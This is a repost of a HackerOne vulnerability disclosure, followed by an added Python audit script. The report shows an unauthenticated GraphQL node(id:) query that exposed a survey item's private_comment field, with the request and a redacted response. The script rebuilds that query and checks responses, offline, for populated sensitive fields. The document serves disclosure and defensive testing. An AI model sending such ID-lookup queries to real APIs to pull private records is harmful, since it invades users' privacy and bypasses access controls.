HackerOne: Team object in GraphQL disclosed private_comment
News category: Security vulnerabilities
Source: vulners.com
Summary: Hi Team, some private (I think) part of GraphQL is revealed to us.

Steps To Reproduce

Without authorization, https://hackerone.com/graphql POST:

{"query":"query { node(id: \"gid://hackerone/SurveyRatingItem/█████\") { ... on SurveyRatingItem{_id,pentester{_id},team{_id},key,private_comment,public_comment,rating,recipient{username,email},subject{... on Report{_id}},survey_rating{_id,team{_id},state,respondent{_id,username,email,pentests{nodes{_id}}}}}}}","variables":{}}

Response:

{"data":{"node":{"_id":"████████","pentester":null,"team":null,"key":"scope","private_comment":"████","public_comment":null,"rating":1,"recipient":null,"subject":null,"survey_rating":{"_id":"█████","team":null,"state":"completed","respondent":{"_id":"████","username":"███","email":null,"pentests":{"nodes":[]}}}}}}

As we can see, the key field takes the value scope. We don't see in which program this happens, but we can see the comments of the participant, and, as we can see, it has the status private.

PS. Yes, we do not see some data, but in the future they may be disclosed in the comments (I think so).

Impact disclosed... ...
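The report above is a classic case of a global `node(id:)` lookup returning an object without checking whether the caller may see each field. The following Python is an added example, not code from the report or from HackerOne: it builds the same kind of unauthenticated `node(id:)` query body and then audits a GraphQL response, offline, for fields a tester treats as private that came back populated. The `SENSITIVE_FIELDS` set, the gid, and the sample response (shaped like the one in the report, with placeholder values where the report is redacted) are constructed for illustration.

```python
"""Audit a GraphQL `node(id:)` response for disclosed private fields.

Added example, not part of the HackerOne report. Runs offline on a
constructed response; the query builder just produces the JSON body
that an unauthenticated POST to the /graphql endpoint would carry.
"""
import json

# Assumption: field names the tester considers private on this object graph.
SENSITIVE_FIELDS = {"private_comment", "email"}

# Selection set copied in shape from the report (what the tester asked for).
SURVEY_RATING_ITEM_SELECTION = (
    "... on SurveyRatingItem{_id,pentester{_id},team{_id},key,"
    "private_comment,public_comment,rating,recipient{username,email},"
    "subject{... on Report{_id}},survey_rating{_id,team{_id},state,"
    "respondent{_id,username,email,pentests{nodes{_id}}}}}"
)


def build_node_query(gid: str, selection: str = SURVEY_RATING_ITEM_SELECTION) -> dict:
    """Return the JSON body for a global-ID `node(id:)` lookup.

    json.dumps quotes the gid so the GraphQL string literal is well formed.
    """
    query = "query { node(id: %s) { %s } }" % (json.dumps(gid), selection)
    return {"query": query, "variables": {}}


def find_disclosed(obj, path="", sensitive=frozenset(SENSITIVE_FIELDS)):
    """Walk a GraphQL `data` tree and yield (path, value) for every
    sensitive field that is present and non-empty (null/[]/{} are ignored)."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            child = f"{path}.{key}" if path else key
            if key in sensitive and value not in (None, "", [], {}):
                yield child, value
            yield from find_disclosed(value, child, sensitive)
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            yield from find_disclosed(item, f"{path}[{i}]", sensitive)


def audit_response(body: dict) -> list:
    """Return [(path, value), ...] for sensitive fields disclosed in `body`.

    Errors are not inspected: a response with data AND errors can still
    leak, so only the `data` subtree is walked.
    """
    return list(find_disclosed(body.get("data") or {}))


# Constructed sample: same shape as the report's response, placeholder values.
SAMPLE_RESPONSE = {
    "data": {
        "node": {
            "_id": "12345678",
            "pentester": None,
            "team": None,
            "key": "scope",
            "private_comment": "example private comment",
            "public_comment": None,
            "rating": 1,
            "recipient": None,
            "subject": None,
            "survey_rating": {
                "_id": "12345",
                "team": None,
                "state": "completed",
                "respondent": {
                    "_id": "1234",
                    "username": "tester",
                    "email": None,
                    "pentests": {"nodes": []},
                },
            },
        }
    }
}


if __name__ == "__main__":
    # Hypothetical gid; the real one in the report is redacted.
    body = build_node_query("gid://hackerone/SurveyRatingItem/12345")
    print(json.dumps(body))
    for path, value in audit_response(SAMPLE_RESPONSE):
        print(f"DISCLOSED {path} = {value!r}")
```

Run it against a real capture by loading the response JSON with `json.load` and passing it to `audit_response`; an empty list means none of the fields you listed came back populated for an anonymous caller. The check is deliberately field-level rather than object-level: the report shows that a node can be resolvable while most relations (`team`, `recipient`) are null, and the leak sits in one scalar field.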